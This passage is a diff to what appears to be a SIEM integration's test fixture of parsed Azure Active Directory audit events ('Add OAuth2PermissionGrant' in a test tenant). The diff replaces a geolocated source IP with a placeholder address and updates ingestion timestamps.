OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory",
 "kind": "event",
@@ -11139,25 +10185,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -11171,7 +10199,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -11307,7 +10335,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -11319,12 +10347,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036403800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\"
:\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103
-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + 
"ingested": "2021-12-09T13:41:51.125153900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -11350,25 +10378,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11382,7 +10392,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11518,7 +10528,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -11530,12 +10540,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036408100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\"
:\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103
-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + 
"ingested": "2021-12-09T13:41:51.125160100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"e